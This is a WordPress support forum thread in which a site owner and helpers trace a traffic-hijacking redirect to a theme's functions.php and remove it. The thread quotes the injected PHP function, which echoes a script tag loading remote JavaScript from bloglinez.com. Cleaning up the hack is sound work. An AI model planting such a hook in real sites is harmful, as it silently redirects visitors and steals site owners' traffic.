Is my site hacked?

I was just in the midst of trying to find out where I got it when I found this post (I downloaded ‘HotGoss’ a few months ago and started having a problem this morning). I’m still searching and will advise if/when I find the source.
I’m guessing that the redirect is switched on and off at whim to route traffic to the target site. Once they have enough people using the theme they start throwing the switch.

Moemontreal…it’s working ok from here (and there’s no longer a reference to bloglinez.com in the page)

Yeah thanks a lot man i found the script in the ‘functions.php’ file
i replaced it with the code u give me and it works fine now.

@esmi thanks for the help too u guys are great.

I bought the theme from a local web designer 3 years ago and i tweaked it my self. Why?

Yeah i need to know where did it come from? i changed my Cpanel password and all the ftps and i will also change my (WP-ADMIN) directory password as well.

Any more tips so i can sleep well tonight? ??

The code wasn’t added to your site…It’s been there all the time. They just flipped the switch using the target js and your site started redirecting. It will be fine now you’ve removed the function so sleep soundly.

BTW…cool sports site.

I’d love to see a sample of one of these themes to see if there’s a way of mass fingerprinting/identifying the hack.

I can upload to server or email if you like but with one line of code in a previously legit (and now unavailable) theme, chances are slim.

If you have a copy, can you mail it to esmi[at]quirm dot net? It could be that the hackers are re-releasing genuine free GPL themes (and we’ve certainly come across that before).

Guys one last thing

now im getting an error

/home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

check it out, its all they way at the bottom of the page.
https://nilesports.com/news/2012/04/13/live-arabs-talent-episode-2-episode-2/

BTW…cool sports site.

Thanks man

Also i will check in my previews backups if that line/script in the Founctions.php file was there before, and i will let u guys know

Fatal error: Call to undefined function mt_misc_header() in /home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

Did you accidentally remove too much when you edited the hack function?

Did you accidentally remove too much when you edited the hack function?

I replaced:

function mt_misc_header() {
	echo '<script src="https://www.bloglinez.com/theme.js" type="text/javascript"></script>';
}

With

function my_settings() {
// echo '';
}

I dont know what went wrong!!!

No. Replace your change with:

function mt_misc_header() {
	echo '';
}

Well now i changed it to:

function mt_misc_header() {
// echo '';
}

And its fixed, can you please check if it works fine on your side too.

Thanks.

Moe.

moemontreal…loads find at my end (some errors but mostly missing images having nothing to do with your theme)

No error here either.

Its confirmed guys,

i found the (Script) on my backup file of 2009 !!!!!!!!!
So yes in deed it was always there sucking up my traffic whenever they want.

Thanks a lot guys for all the help and time ??